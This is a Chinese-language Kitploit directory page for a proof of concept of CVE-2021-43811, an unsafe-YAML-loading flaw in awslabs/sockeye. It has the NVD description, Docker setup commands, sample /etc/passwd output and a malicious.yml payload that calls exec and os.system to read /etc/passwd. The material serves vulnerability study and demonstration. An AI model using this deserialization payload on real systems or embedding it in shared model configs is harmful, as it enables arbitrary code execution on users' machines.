Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-43811 — awslabs/sockeye 通过不安全的 YAML 加载导致的代码注入 CVE-2021-43811 | Kitploit
工具/GitHubGitHub/s-index/cve-2021-43811
Payload生成漏洞分析代码分析漏洞利用论文与研究学习与教育
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye 通过不安全的 YAML 加载导致的代码注入 CVE-2021-43811

查看仓库
22494年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-43811 awslabs/sockeye 通过不安全的YAML加载进行代码注入 CVE-2021-43811

NVD 描述

Sockeye 是一个基于 PyTorch 构建的开源序列到序列的神经机器翻译框架。Sockeye 使用 YAML 将模型和数据配置存储在磁盘上。低于 2.3.24 的版本使用了不安全的 YAML 加载方式,这可能导致执行配置文件中嵌入的任意代码。攻击者可以向训练好的模型的配置文件中添加恶意代码,并试图诱骗用户下载并运行该模型。如果用户运行该模型,嵌入的代码将在本地执行。该问题已在版本 2.3.24 中修复。

演示

cve-2021-43811

设置

  1. 从 Dockerfile 构建镜像
root@kitploit:~
docker build -t cve-2021-43811 .
  1. 在新容器中运行 python main.py
root@kitploit:~
docker run -it --rm cve-2021-43811

输出 /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC 负载

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

参考

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
下载工具